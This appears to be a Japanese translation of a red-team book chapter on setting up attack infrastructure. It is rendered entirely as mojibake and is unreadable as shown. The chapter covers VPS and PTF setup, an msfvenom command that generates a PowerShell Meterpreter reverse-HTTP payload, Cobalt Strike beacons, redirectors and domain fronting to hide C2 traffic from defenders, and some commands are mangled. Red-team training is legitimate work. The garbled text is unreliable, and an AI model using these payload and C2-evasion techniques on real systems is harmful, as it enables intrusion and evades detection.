第1ç« è©Šååã®æºå - ã€ã³ã¹ããŒã«
翻蚳è ïŒ@snowming
ã¬ããããŒã ã®ã¡ã³ããŒãšããŠãç§ãã¡ã¯éåžžãæ»æã®ç®çã«ããŸã泚æãæããŸããïŒæ»ææ¹æ³ã®è©³çްïŒã代ããã«ããããã®é«åºŠãªè åšçµç¹ã®TTPïŒæŠè¡ããã¯ããã¯æé ïŒãã詳现ãåŠã³ãããšèããŠããŸããããšãã°ãããã¯Fireeyeã®å ¬å ±è åšã€ã³ããªãžã§ã³ã¹åæã¬ããŒãã§ããã¬ããŒãããããã®è åšçµç¹ã¯TwitterãC2ãµãŒããŒãšããŠäœ¿çšããŠãããæå·åãããç»åãšæ å ±ã®ã¹ãã¬ãã°ã©ãã£ãä¿åããããã®ãªããžããªãšããŠGithubã䜿çšããŠããããšãããããŸãããã®ã¬ããŒããåç §ããŠãæ»ææ¹æ³ã®ç¹æ§ã«åºã¥ããŠã¿ãŒã²ãããçµã£ãé©åãªé²è¡èšç»ãäœæããŠãäŒç€Ÿããã®ãããªæ»æãæ€åºããŠååã§ãããã©ããã確èªã§ããŸãã
APTæ»æã®åºæ¬çãªç޹ä»ãããŸãããã MITRã«ãã£ãŠææ¡ãããŠããATTCKãããªãã¯ã¹ïŒæµå¯ŸçãªæŠè¡ãæè¡ãããã³äžè¬çãªç¥èãããªãã¯ã¹ïŒã¯ãAPTæ»æã®è©³çްãªåè§£ã§ãããã®ãããªãã¯ã¹ã«ã¯ãããŸããŸãªæ»æã·ããªãªã§äœ¿çšãããããŸããŸãªTTPã®å€§èŠæš¡ãªã³ã¬ã¯ã·ã§ã³ããããŸãã
åçšATTCKãããªãã¯ã¹-Windows
翻蚳è ã®ã¡ã¢ïŒ
äžèšã®ãããªãã¯ã¹ã¯ãWindowsãã©ãããã©ãŒã ã«é©ãããã¯ãããžãŒã®ã¿ãæ¡åŒµããŸããå®å šãªåçšãšã³ã¿ãŒãã©ã€ãºATTïŒCKãããªãã¯ã¹ã«ã¯ãMacOSããã³Linuxãã©ãããã©ãŒã åãã®ãã¯ãããžãŒãå«ãŸããŠããŸãã
ãããªãã¯ã¹ã®å 容ã¯ãå ã®æ¬ããå³å¯ã«ã³ããŒãããŠããŸããããã¯ãå ã®æ¬ã®åçã®è§£æ±ºãäœããããããšãã£ãŠãèªè ã®èªæžäœéšã®ããã«ç¹å¥ã«æ°ããåçãäœããŸããã ATTCKãããªãã¯ã¹ã¯ãŸã äžåœèªã§ç¿»èš³ãããŠããŸããã翻蚳è ã®æèœãã·ã³ãã«ã§ããããŠéã翻蚳ãäžããŠããªããããè±èªãä¿æããŠããŸãããã ããæ¬ã«ãªã¹ããããŠãããããªãã¯ã¹ã³ã³ãã³ãã¯ããããªãã¯ã¹ãæ¹èšããããããããããªããããªãã¯ã¹ã³ã³ãã³ããšã¯ç°ãªãããšã«æ³šæããå¿ èŠããããŸãããããã£ãŠãEnterprise Matrixã®å ¬åŒWebãµã€ãã¢ãã¬ã¹-Windowsã¯ãèªè ã®ãªãã¡ã¬ã³ã¹çšã«äžããããŸãã
å¥ã®ãªãœãŒã¹ã¯ã @cyb3ropsã«ãã£ãŠã³ã³ãã€ã«ãããAPTçµç¹ãšã¡ãœããã®ç¶ç¶çãªæŽæ°ãªã¹ãã§ãããã®Googleãã¡ã€ã«ã«ã¯ãçãããAPTçµç¹ãšäžçäžã®è€æ°ã®åœã§äœ¿çšãããŠããããŒã«ã»ããããªã¹ããããŠããŸãã RedããŒã ã¡ã³ããŒã®å Žåããã®ããã¥ã¡ã³ããåç §ããŠãããŸããŸãªæ»æãã·ãã¥ã¬ãŒãã§ããŸãããã¡ãããããã¥ã¡ã³ãã«ãªã¹ããããŠããã®ãšåãããŒã«ã䜿çšããããšã¯ã§ããŸããããåãæ»æãè¡ãããã«åæ§ã®ããŒã«ãæ§ç¯ã§ããŸãã
ãã¬ãŒã¯ã¹ã«ãŒæŒç¿ãä»®å®ãã
ã»ãã¥ãªãã£ã®åé¡ã«çŽé¢ããŠãäŒæ¥ã®æ£ããæ åºŠã¯ãæåããããã劥åããããšä»®å®ããããšã§ããããããå®éã«ã¯ãããŸãã«ãå€ãã®äŒæ¥ããããããã»ãã¥ãªãã£æ§æãŸãã¯å¹Žé浞éãã¹ããéããŠå®å šã§ãããšèããŠããŸããç§ãã¡ã¯æèã®ç¶æ ã«å ¥ãå¿ èŠããããŸããç§ãã¡ã¯åžžã«ãæªãç§ãã¡ã®åšãã«æœãã§ãããšä»®å®ããŠãåžžã«ç°åžžãæ¢ãå¿ èŠããããŸãã
ããã¯ãã¬ããããŒã ã®æŽ»åãæµžéãã¹ããšã¯å€§ããç°ãªãå Žæã§ãã RedããŒã ã®æŽ»åã¯ãè匱æ§ã§ã¯ãªã察çã®æ€åº/æäŸã«çŠç¹ãåœãŠãŠããããããããŠããŒã¯ãªè©äŸ¡ãè¡ãããšãã§ããŸããã¯ã©ã€ã¢ã³ãã«å€§ããªäŸ¡å€ãæäŸããè©äŸ¡ã®å©ç¹ã¯ãæ³å®ãããéåæŒç¿ãšåŒã°ããŸãã仮説çãªãã¬ãŒã¯ã¹ã«ãŒæŒç¿ã§ã¯ãééãã0æ¥éã¯åžžã«ãããŸããããã§ãã¯ã©ã€ã¢ã³ãã¯ã2çªç®ãšç¬¬3段éã®ã¹ãããã®åœ±é¿ãèªèããŠè»œæžã§ããŸããïŒ
ãããã®ã·ããªãªã§ã¯ãRedããŒã ã¯ç€Ÿå ã®éãããããŒã ãšååããŠããµãŒããŒã§ã«ã¹ã¿ã ãã«ãŠã§ã¢ãã€ããŒããå®è¡ããŸãããã®ãã€ããŒãã¯ãè€æ°ã®æ¹æ³ã§æ¥ç¶ããäžè¬çãªAVããã€ãã¹ããã¡ã¢ãªããäœåãªãã€ããŒããå®è¡ã§ããããã«ããå¿ èŠããããŸããæ¬å šäœã§ãã€ããŒãã®äŸãããã€ãæäŸããŸããæåã®ãã€ããŒããå®è¡ããããšããã¹ãŠã®æ¥œãã¿ãããããå§ãŸããŸãïŒ
ã¢ã¯ã·ã§ã³ãèšå®
ããã¯ãã¬ããããŒã ã€ãã³ãã®ç§ã®ãæ°ã«å ¥ãã®éšåã§ããæåã®ã·ã¹ãã ãæ»æããåã«ãã¬ããããŒã ã®ã¢ã¯ãã£ããã£ç¯å²ã決å®ããå¿ èŠããããŸããå€ãã®äŸµå ¥ãã¹ãã§ã¯ãç®æšãéæãããã®åäžã®ã·ã¹ãã ã«å ¥ãããšãç¶ããŸããäœãã倱æããå Žåãæ¬¡ã®ããšã«ç§»ããŸããã¹ã¯ãªããããªããã°ãéåžžããã®ãããã¯ãŒã¯ã«éåžžã«çŠç¹ãåœãŠãŠããŸãã
Red Teamã€ãã³ãã§ã¯ãããã€ãã®ç®æšããå§ããŸãããããã®ç®çã¯ããå«ããããããŸãããããããã«éå®ãããŸãã
究極ã®ç®æšã¯äœã§ããïŒé©åãªæ€åºã§ããïŒãµãŒããŒã«ãã©ã°ãååŸããå¿ èŠããããŸããïŒããŒã¿ããŒã¹ããããŒã¿ãååŸããŠããŸããïŒãŸãã¯ãæ€åºã¿ã€ã ãã¹ïŒTTDïŒã€ã³ãžã±ãŒã¿ãŒãååŸããã ãã§ããïŒ
ã³ããŒãããå ¬çãªæŽ»åã¯ãããŸããïŒ
ã©ããªãã¯ããã¯ã䜿çšããŸããïŒ Miter ATTCKãããªãã¯ã¹ã®äœ¿çšã«ã€ããŠèª¬æããŸããããåã«ããŽãªã®æ£ç¢ºãªææ³ã¯äœã§ããïŒ
Red Canary Research Groupã¯ãåææ³ã«é¢ãã詳现æ å ±ãæäŸããŠããŸãããããã®è©³çްã衚瀺ããããã«å°ãæéããããããšã匷ããå§ãããŸãã
顧客ã¯ã©ã®ããŒã«ã䜿çšããŠã»ããã§ããïŒ MetasploitãCobalt StrikeãDNS CATãªã©ã®åçšæ»æããŒã«ãœãããŠã§ã¢ã¯ãããŸããïŒãŸãã¯èªå®¶è£œã®ã«ã¹ã¿ãã€ãºããŒã«ïŒ
è¯ããã¥ãŒã¹ã¯ããã£ãããããããšãè©äŸ¡ã®äžéšã§ãããšããããšã§ãã 4ã5åãã£ããããã4ã5çš®é¡ã®ç°å¢ã§æé€ããã䟵ç¥ãããã€ããããŸããããã¯ã顧客ãäºæ³éãã«é²åŸ¡ãæ©èœããŠããïŒãŸãã¯æ©èœããŠããªãïŒããšã顧客ã«ç€ºããŸããæ¬ã®æåŸã«ãã¡ããªãã¯ãååŸããŠãã®ããŒã¿ãå ±åããæ¹æ³ã瀺ãã¬ããŒãã®äŸãããã€ãæäŸããŸãã
å€éšãµãŒããŒ
ãèšå®ããŸãã¬ããããŒã ã®ã¢ã¯ãã£ããã£ãæ§ç¯ããããã«ãããŸããŸãªãµãŒãã¹ã䜿çšããŠããŸãã仿¥ã®VPSã®äžçã§ã¯ãã€ã³ã¿ãŒãããäžã®æ»æè ã«æµæããæ©æ¢°ã¯äºç®ãè¶ ããŸãããããšãã°ãç§ã¯éåžžãDigital OceanãŸãã¯AWSã®Lightsail ServerããDroplets Compute Serviceã䜿çšããŠãVPSãµãŒããŒãæ§æããŸãããããã®ãµãŒãã¹ã䜿çšããçç±ã¯ãéåžžãå®äŸ¡ãªïŒå Žåã«ãã£ãŠã¯ç¡æïŒãUbuntuã·ã¹ãã çšã®ãµãŒããŒã®ãªãã·ã§ã³ããããå¿ èŠã«å¿ããŠããŸããŸãªå°åã®ãµãŒããŒãè³Œå ¥ããããšãéžæã§ããããã§ããæãéèŠãªããšã¯ãã»ããã¢ãããéåžžã«ç°¡åã§ããæ°å以å ã«ãè€æ°ã®ãµãŒããŒã®Metasploitããã³Empire Servicesãã»ããã¢ããããã³å®è¡ã§ããŸãã
ãã®æ¬ã§ã¯ãAWSã®Lightsail Serverã«çŠç¹ãåœãŠãã»ããã¢ãããããããµãŒãã¹ãèªååããããéåžžAWSã«è¡ããã©ãã£ãã¯ãèªååãããã§ããŸãã奜ããªç»åãæ£åžžã«äœæããåŸãç»åãè€æ°ã®ãµãŒããŒã«ãã°ããã¯ããŒã³ããããšãã§ããŸããããã«ãããæ¢è£œã®C2ïŒã³ãã³ãããã³ã³ã³ãããŒã«ïŒããã¯ã¹ãç°¡åã«æ§ç¯ã§ããŸãã
ç¹°ãè¿ããŸãããåé¡ã«é¥ããªãããã«ãVPSãããã€ããŒã®ãµãŒãã¹å©çšèŠçŽã«åŸãããã«ããå¿ èŠããããŸãã
æäœã®éèŠãªãã€ã³ãã¯æ¬¡ã®ãšããã§ãã
https://lightsail.aws.amazon.com/
ã€ã³ã¹ã¿ã³ã¹ãäœæããŸã
å°ãªããšã1GBã®ã¡ã¢ãªã䜿çšããããšã匷ããå§ãããŸã
ããŒããã£ã¹ã¯ã®ãµã€ãºã«äžè¬çã«åé¡ã¯ãããŸããã奜ããªããã«éžæã§ããŸã
Linux/unix
ãªãã¬ãŒãã£ã³ã°ã·ã¹ãã ã®ã¿ - ubuntu
èšŒææžãããŠã³ããŒãããŠãã ãã
CHMOD 600 CERTïŒç¿»èš³è ã®æ³š:ææè ã®ã¿ãèªã¿åãããã³æžã蟌ã¿èš±å¯ãæã£ãŠããŸãïŒ
ssh -i cert ubuntu@[ip]
ãµãŒããŒãæ§ç¯ããããã®ç°¡åãªæ¹æ³ã¯ãTrustedSecã®äŸµå ¥ãã¹ããã¬ãŒã ã¯ãŒã¯ïŒPTFïŒãçµ±åããããšã§ãã PTFãã¬ãŒã ã¯ãŒã¯ã¯ãããªãã®ããã«å€ãã®ããŒãã¯ãŒã¯ãè¡ããä»ã®ãã¹ãŠã®ãã¬ãŒã ã¯ãŒã¯ãäœæã§ããã¹ã¯ãªããã®ã³ã¬ã¯ã·ã§ã³ã§ãããã¹ãŠã®ãšã¯ã¹ããã€ãã¢ãžã¥ãŒã«ãæ å ±åéã¢ãžã¥ãŒã«ã浞éåŸãšã¯ã¹ããã€ãã¢ãžã¥ãŒã«ãPowerShellæ»æã¢ãžã¥ãŒã«ãããã³è匱æ§åæããŒã«ãç°¡åã«ã€ã³ã¹ããŒã«ããŸãããã
sudo su-
Apt-Getã¢ããããŒã
apt-getã€ã³ã¹ããŒã«python
git clonehttps://github.com/trustedsec/ptf/opt/ptf
cd/opt/ptf ./ptf
ã¢ãžã¥ãŒã«/exploitation/install_update_allã䜿çšããŸã
ã¢ãžã¥ãŒã«/ã€ã³ããªãžã§ã³ã¹åé/install_update_allã䜿çšããŸã
ã¢ãžã¥ãŒã«/ççºåŸ/install_update_allã䜿çšããŸã
Modules/PowerShell/install_update_allã䜿çšããŸã
ã¢ãžã¥ãŒã«/è匱æ§- åæ/install_update_allã䜿çšããŸã
CD /Pentest
次ã®å³ã¯ãå©çšå¯èœãªãã¹ãŠã®ã¢ãžã¥ãŒã«ã瀺ããŠããããã®äžéšã¯èªåã§ã€ã³ã¹ããŒã«ããŸããã
å³:å©çšå¯èœãªãã¹ãŠã®ã¢ãžã¥ãŒã«ã®ãªã¹ã
æ»æè
VPSãèŠããšããã·ã³ã«ã€ã³ã¹ããŒã«ãããŠãããã¹ãŠã®ããŒã«ã衚瀺ãããŸãã Metasploitãéå§ãããå Žåã¯ãMSFCONSOLEãå
¥åã§ããŸãã
å³: /Pentestãã©ã«ããŒã«ã€ã³ã¹ããŒã«ãããŠãããã¹ãŠã®ããŒã«
匷åãªiPtablesã«ãŒã«ãäœæããããšããå§ãããŸããããã¯æ»æãµãŒããŒã«ãªããããSSHèªèšŒãéå§ã§ããå ŽæãEmpire/MeterPreter/Cobalt Strikeã®ãã€ããŒããéå§ã§ããå Žæãããã³ãµããŒããããã£ãã·ã³ã°ããŒãžãå¶éããããšããå§ãããŸãã
2016幎åŸåã«èŠããŠããå Žåã誰ããèªèãããŠããªããªã¢ãŒãã³ãŒãå®è¡ïŒRCEïŒïŒhttps://Blog.cobaltstrike.com/2016/09/28/cobalt-strike-rce-exploitate-reported/ïŒãçºèŠããŸããã確ãã«ãæ»æããããµãŒããŒã«ãã£ãŠé¡§å®¢ããŒã¿ãç Žæããããšãæãã§ããŸããã
AWSã§Kali LinuxïŒãŸãã¯å°ãªããšãMetasploitïŒãå®è¡ããŠããèµ€ãããŒã ãããã€ãèŠãŠããŸããïŒ:http://bit.ly/2qz2vn9ãåç §ïŒãç§ã®æèŠã§ã¯ãç¬èªã®ã·ã¹ãã ãäœæããŠãæ§ããŸãããããããããè¯ããªãã·ã§ã³ã¯ãè€æ°ã®ãã·ã³ãå±éããããã®å¹ççã§ç¹°ãè¿ãå¯èœãªããã»ã¹ãäœæããããšã§ãã Lightsailã䜿çšããããšã®æå€§ã®å©ç¹ã¯ããã·ã³ã奜ã¿ãšããŠæ§æãããšã1ã€ã®ãã·ã³ãã¹ãããã·ã§ããããŠããã®ç»åã䜿çšããŠè€æ°ã®æ°ããã€ã³ã¹ã¿ã³ã¹ãå±éã§ããããšã§ãã
ç°å¢ã次ã®ã¬ãã«ã«åŒãäžãããå Žåã¯ãCoalfire Instituteã®ããŒã ãã芧ãã ãããã«ã¹ã¿ã ã¢ãžã¥ãŒã«ãæ§ç¯ããŠããã¹ãŠã®ããŒãã¯ãŒã¯ãšèªååãå®è¡ããŸãã Red Baronã¯ãTerraformã®ã¢ãžã¥ãŒã«ãšã«ã¹ã¿ã /ãµãŒãããŒãã£ãããã€ããŒã®ã»ããã§ãããRedããŒã åãã®æè»ã§1åéããå®å šã§æè»ãªã€ã³ãã©ã¹ãã©ã¯ãã£ãèªåçã«äœæããŸãããã£ãã·ã³ã°ãµãŒããŒã®æ§ç¯ãã³ãã«ãã¹ãã©ã€ã¯ã€ã³ãã©ã¹ãã©ã¯ãã£ãDNS C2ãµãŒããŒã®äœæãªã©ãTerraformã䜿çšããŠãã¹ãŠå®è¡ã§ããŸãã
https://github.com/coalfire-research/red-baronããã§ãã¯ããŠããã¹ãŠã®ç°ãªãã¢ãžã¥ãŒã«ã衚瀺ããŠãç¬èªã®ã€ã³ãã©ã¹ãã©ã¯ãã£ããã°ããæ§ç¯ããŠãã ããã
èµ€ãããŒã ã®ã³ã¢ããŒã«
RedããŒã ã¯å€ãã®ããŒã«ã䜿çšããå ŽåããããŸãããæãã³ã¢ããŒã«ã®ããã€ãã«ã€ããŠèª¬æããŸãããã RedããŒã ã®ã¡ã³ããŒãšããŠãç§ãã¡ã®ç®æšã¯ç°å¢ãç Žå£ããããšã§ã¯ãªãïŒããã¯æãè峿·±ããã®ã§ããïŒãå®éã®æ»æãè€è£œããŠã顧客ãä¿è·ãããŠãããéåžžã«çãæéã§æ»æãæ€åºã§ãããã©ããã確èªããããšã§ããããšãå¿ããªãã§ãã ãããåã®ç« ã§ã¯ãä»ã®APTçµç¹ããæ»æè ã®ãããã¡ã€ã«ãšããŒã«ã»ãããã³ããŒããæ¹æ³ãåŠãã ã®ã§ãæãäžè¬çãªREDããŒã ããŒã«ã®ããã€ãã確èªããŸãããã
metasploitãã¬ãŒã ã¯ãŒã¯
ãã®æ¬ã¯ã以åã®æ¬ã®ããã«ã¡ã¿ããã€ãã®æ·±ãã«ã¯ãªããŸããã Metasploitãã¬ãŒã ã¯ãŒã¯ã¯2003幎以æ¥å ã éçºãããŸããããä»ã§ãçŽ æŽãããããŒã«ã§ããããã¯ãå ã®éçºè H.D.ã®ç¶ç¶çãªãµããŒãã«ãããã®ã§ããã ãŒã¢ãšéåžžã«æŽ»çºãªã³ãã¥ããã£ãæ¯æ¥æŽæ°ãããŠãããšæããããã®ã³ãã¥ããã£äž»å°ã®ãã¬ãŒã ã¯ãŒã¯ã«ã¯ãææ°ã®è匱æ§ã®æŸåãæµžéåŸã®æŸåã¢ãžã¥ãŒã«ãè£å©ã¢ãžã¥ãŒã«ãªã©ããã¹ãŠãããŸãã
Red Team Projectã®å ŽåãMetasploitã䜿çšããŠMS17-010 Eternal Blueã®è匱æ§ãä»ããŠå éšã·ã¹ãã ã䟵害ããŠæåã®ã€ã³ãã©ãããã·ã§ã«ãååŸããããMetaSploitã䜿çšããŠãœãŒã·ã£ã«ãšã³ãžãã¢ãªã³ã°æ»æã®ã¡ãŒã¿ãŒãã¬ã¿ãŒã®ãã€ããŒããçæããå ŽåããããŸãã
åŸã®ç« ã§ã¯ãMetasploitãã€ããŒããåã³ã³ãã€ã«ãããŠã€ã«ã¹å¯ŸçãœãããŠã§ã¢ãšãããã¯ãŒã¯ç£èŠããã€ãã¹ããæ¹æ³ã玹ä»ããŸãã
æ··ä¹±ããŠããã¡ãŒã¿ãŒãã¬ã¿ãŒã®ãã€ããŒã
ã¿ãŒã²ããã§ãœãŒã·ã£ã«ã¯ãŒã¯ã®è©Šã¿ãè¡ã£ãŠããå Žåããã€ããŒãã®é鿥è ãšããŠWordãŸãã¯Excelããã¥ã¡ã³ãã䜿çšããå ŽåããããŸãããã ããæœåšçãªåé¡ã¯ãMeterPreterã®ãã€ããŒãã«ãã€ããªãã¡ã€ã«ãå«ããããšããã¿ãŒã²ãããã·ã³ã«Webãããã€ããŒããããŠã³ããŒããããããšãã§ããªãå¯èœæ§ãããããšã§ãããããã®æäœã¯ãã¿ãŒã²ãããã·ã³ã®ãŠã€ã«ã¹å¯ŸçãœãããŠã§ã¢ã®ã¢ã©ãŒããããªã¬ãŒããå¯èœæ§ãããããã§ããã ãããããã«ãã¡ãžã³ã°ã«PowerShellã䜿çšããŠãç°¡åãªãœãªã¥ãŒã·ã§ã³ããããŸãã
MSFVENOM -PAYLOAD WINDOWS/X64/METERPRETER_REVERSE_HTTP -FORMAT PSH -OUT METERPRETER -64.PS1 LHOST=127.0.0.1
é£èªåãæ¬¡ã®ã¬ãã«ã«åŒãäžããUnicornãªã©ã®ããŒã«ã䜿çšããŠããã®æ¬ã§è©³çްã«ã«ããŒãããã¡ãžãŒãã¯ãŒã·ã§ã«ããŒã¹ã®ã¡ãŒã¿ãŒãã¬ã¿ãŒãã€ããŒããçæããããšãã§ããŸãã
ããã«ãä¿¡é Œã§ããæ©é¢ã«ãã£ãŠçºè¡ãããSSL/TLSèšŒææžã䜿çšãããšãç¹å®ã®ãããã¯ãŒã¯ã§IDïŒäŸµå ¥æ€ç¥ã·ã¹ãã ïŒããã€ãã¹ããã®ã«åœ¹ç«ã¡ãŸãã詳现ã«ã€ããŠã¯ãå®è£ ããã«ã¯æ¬¡ã®ãªã³ã¯ãåç §ããŠãã ããïŒMeterPreter Paranoidã¢ãŒãã
æåŸã«ããã®æ¬ã®åŸåã§ã¯ãMetasploit/MeterPreterã䜿çšããŠãã¹ãããŒã¹ãšãããã¯ãŒã¯ããŒã¹ã®æ€åºããŒã«ããã€ãã¹ããæ¹æ³ã«ã€ããŠèª¬æããŸãã
ã³ãã«ãã¹ãã©ã€ã¯
ã³ãã«ãã¹ãã©ã€ã¯ã¯ãç§ã®ãæ°ã«å ¥ãã®ã¬ããããŒã ã·ãã¥ã¬ãŒã·ã§ã³ããŒã«ã®1ã€ã§ããã³ãã«ãã¹ãã©ã€ã¯ãšã¯äœã§ããïŒããã¯ãåŸææ®µéã§æç¶ããæµžéãæ°Žå¹³æ¹åã®åãã亀éã®é ããããã³ããŒã¿ã®çé£ã®ããã®ããŒã«ã§ããã³ãã«ãã¹ãã©ã€ãã«ã¯çŽæ¥çãªæŸåã¯ãªããææ°ã®0æ¥éã®è匱æ§ã§ã·ã¹ãã ã䟵害ããŠããŸããããã£ãã·ã³ã°ãã£ã³ããŒã³ã®äžéšãšããŠãµãŒããŒã§æªæã®ããCSã³ãŒããå®è¡ããŠããããCSã䜿çšããŠããå ŽåãCSãã©ãã»ã©åºç¯ã§åŒ·åãªCSã§ããããæããããšãã§ããŸãããã·ã³ã§Cobalt Strikeã®ãã€ããŒããå®è¡ã§ããããC2ãµãŒããŒïŒTeamServerïŒã«æ»ãããŒã³ã³ïŒãªã¢ãŒãããã€ã®æšéŠ¬ïŒæ¥ç¶ãäœæããŸãã
æ°ããã³ãã«ãã¹ãã©ã€ã¯ã©ã€ã»ã³ã¹ã®è²»çšã¯3,500ãã«ïŒ1人ã®ãŠãŒã¶ãŒã®å Žåã¯1幎ïŒã®ã§ãå®äŸ¡ãªããŒã«ã§ã¯ãããŸããããã ãããœãããŠã§ã¢ã«ã¯ç¡æã®éå®è©ŠéšããŒãžã§ã³ããããŸãã
ã³ãã«ãã¹ãã©ã€ã¯ã€ã³ãã©ã¹ãã©ã¯ãã£
äžèšã®ããã«ãã€ã³ãã©ã¹ãã©ã¯ãã£ã®èгç¹ããããã®ãããªåå©çšå¯èœã§éåžžã«æè»ãªç°å¢ãã»ããã¢ããããããšèããŠããŸããã³ãã«ãã¹ãã©ã€ã¯ã¯ãªãã€ã¬ã¯ãããµããŒãããŸããã³ãã«ãã¹ãã©ã€ã¯ã§äœ¿çšãããŠããC2ãã¡ã€ã³åãç Žå£ãããå Žåãæ°ããç°å¢ãäœæããã³æå¹ã«ããå¿ èŠã¯ãããŸãããæ°ããC2ãã¡ã€ã³åã亀æããã ãã§ãã SOCATã䜿çšããŠãããã®ãªãã€ã¬ã¯ã¿ãŒã®æ§æã«é¢ãã詳现æ å ±ãã芧ãã ããïŒãªã³ã¯1ãªã³ã¯2
ãªãã€ã¬ã¯ããæ¹åããã«ã¯ããã¡ã€ã³åããªã»ããïŒãã¡ã€ã³åã«ããŒïŒã䜿çšã§ããŸãããã¡ã€ã³åã®å眮è©ã¯ãä»ã®ãã¡ã€ã³åãšã€ã³ãã©ã¹ãã©ã¯ãã£ãã¯ãããžãŒãã³ã³ãããŒã©ãŒãªãã€ã¬ã¯ããšããŠäœ¿çšãããã¯ãããžãŒã®ã³ã¬ã¯ã·ã§ã³ã§ãïŒåç §ãªã³ã¯ïŒãããã¯ãAmazon Cloudã®CloudFrontãä»ã®Googleãã¹ããªã©ã人æ°ã®ããã³ã³ãã³ãé ä¿¡ãããã¯ãŒã¯ïŒCDNïŒã䜿çšããŠããã©ãã£ãã¯ãœãŒã¹ãé ãããšã§å®è¡ã§ããŸããããã¯ãéå»ã«ç°ãªãæ»æè ã«ãã£ãŠæªçšãããŠããŸããïŒãªã³ã¯ãåç §ïŒã
ãããã®é«å ±åãã¡ã€ã³ã䜿çšããããšã«ãããHTTPãŸãã¯HTTPSããã®ãã©ãã£ãã¯ã¯ãæªæã®ããC2ãµãŒããŒã§ã¯ãªãããããã®ãã¡ã€ã³ãšéä¿¡ããŠããããã«èŠããŸããããã¯ãã¹ãŠã©ã®ããã«æ©èœããŸããïŒæ¯èŒçæœè±¡çãªäŸã§ã¯ããã¹ãŠã®ãã©ãã£ãã¯ã¯ãã¯ã©ãŠãããã³ãã®äž»èŠãªãã¡ã€ã³åã§ããA0.awsstatic.comãªã©ãCloudFrontã®äž»èŠãªå®å šè³æ Œã®ãã¡ã€ã³åïŒFQDNSïŒã«éä¿¡ãããŸãããªã¯ãšã¹ãã§ãã¹ãããããŒã倿Žãããšããã¹ãŠã®ãã©ãã£ãã¯ãã¯ã©ãŠãããã³ãé ä¿¡ã«ãªãã€ã¬ã¯ããããæçµçã«ãã©ãã£ãã¯ãã³ãã«ãã¹ãã©ã€ã¯C2ãµãŒããŒã«è»¢éãããŸãïŒãªã³ã¯ãåç §ïŒã
HTTPãã¹ãã®ããããŒã倿Žããããšã«ãããCDNã¯ãã©ãã£ãã¯ãç°¡åã«æ£ãããµãŒããŒã«æ»ããŸãã RedããŒã ã¯ããã®ãã¯ãããžãŒã䜿çšããŠãé«è¡šçŸãã¡ã€ã³ã䜿çšããŠC2ãµãŒããŒããã®ãã©ãã£ãã¯ãé ããŠããŸãã
ãã¡ã€ã³åã®åææ¡ä»¶ããµããŒããã2ã€ã®ç°ãªãäŒæ¥ããã®2ã€ã®åªãããªãœãŒã¹ïŒ
Cyberarkã¯ãŸããGoogleã®ã¢ããªè£œåã䜿çšããŠwww.google.comãmail.google.comããŸãã¯docs.google.comãä»ããŠãã©ãã£ãã¯ãæµããããã«èŠããããã«ããæ¹æ³ã玹ä»ããè¯ãããã°æçš¿ãæžããŸããã
Vincent Yiuã¯ãAlibaba CDNã䜿çšããŠç¬èªã®ãã¡ã€ã³åã®äºåæ»æããµããŒãããæ¹æ³ã«é¢ããèšäºãæžããŸããã
ã³ãã«ãã¹ãã©ã€ã¯ã¯ããã¡ã€ã³åããªã»ããããµããŒãã§ããå¯äžã®ããŒã«ã§ã¯ãªããã¡ãŒã¿ãŒãã¬ã¿ãŒãä»ããŠå®è¡ããããšãã§ããŸãïŒãªã³ã¯ãåç §ïŒã
泚:ãã®æ¬ãå ¬éããããšããAWSïŒGoogle Cloudã§ããïŒããã§ã«ãã¡ã€ã³åããªã»ããïŒhttps://amzn.to/2i6lsryïŒãä¿è·ãå§ããŠããŸãããããã¯ããã®ã¿ã€ãã®æ»æãé²ãã®ã§ã¯ãªãããããå©çšããããã«ç°ãªããµãŒãããŒãã£ã®ãªãœãŒã¹ãå¿ èŠãšããã ãã§ãã
ã€ã³ãã©ã¹ãã©ã¯ãã£ã®äžéšã§ã¯ãããŸããããå éšç°å¢ã§ããŒã³ã³ãã©ã®ããã«æ©èœãããããŸã çè§£ããå¿ èŠããããŸããéçšäžã®ã»ãã¥ãªãã£ã®èгç¹ãããç°¡åã«çºèŠããã¯ãªã¢ãããæ°žç¶çãªæ¥ç¶ã®ç¢ºç«ãé¿ããå¿ èŠããããŸãã RedããŒã ã®ã¡ã³ããŒãšããŠãã¯ã©ã€ã¢ã³ãã®äžéšãBlueããŒã ã«ãã£ãŠçºèŠããããšä»®å®ããå¿ èŠããããŸãããã¹ãŠã®ãã¹ãã1ã€ãŸãã¯2ã€ã®C2ãµãŒããŒãšéä¿¡ããå Žåããã«ãŒããŒã ã¯ã€ã³ãã©ã¹ãã©ã¯ãã£å šäœãç°¡åã«æ ¹ãããã«ããããšãã§ããŸãã幞ããªããšã«ãCobalt Strikeã¯ãã€ã³ãã©ããããã¹ãéã®SMBããŒã¹ã®ããŒã³ã³ã®äœ¿çšãçžäºäœçšã®ããã«äœ¿çšããããšããµããŒãããŠããŸããããã«ãããææããã³ã³ãã¥ãŒã¿ãŒãéåžžã®é©åãªããŒã³ã³ã§C2ãµãŒããŒã«æ¥ç¶ããå éšãããã¯ãŒã¯äžã®ä»ã®ãã¹ãŠã®ãµãŒããŒãSMBãããã³ã«ãä»ããŠæåã«ææãããã¹ããšéä¿¡ããããšãã§ããŸãããã®æ¥ç¶ã«ãããBlueããŒã ãã¬ãã«2ã·ã¹ãã ã®åé¡ãæ€åºããæ³å»åŠåæãå®è¡ãããšãæ»æã«é¢é£ä»ããããC2ãµãŒããŒãã¡ã€ã³åãç¹å®ã§ããªãå ŽåããããŸãã
ã³ãã«ãã¹ãã©ã€ã¯ã¯ãããŒã³ã³éä¿¡ãæäœã§ããŸããããã¯ãã¬ããããŒã ã¡ã³ããŒã«ãšã£ãŠéåžžã«äŸ¿å©ãªæ©èœã§ããã«ã¹ã¿ã C2æ§æãã¡ã€ã«ã䜿çšããŠãææãããã¹ãã·ã¹ãã ããã®ãã¹ãŠã®ãã©ãã£ãã¯ãéåžžã®ãã©ãã£ãã¯ãšåãããã«èŠããããšãã§ããŸããããã§ãã¬ã€ã€ãŒ7ãããã¯ãŒã¯ã¢ããªã±ãŒã·ã§ã³ã¬ã€ã€ãŒã®ã€ã³ãã©ãããç°å¢ããŸããŸããã£ã«ã¿ãªã³ã°ããããšãããããŸããå€ãã®å Žåããã«ãŒããŒã 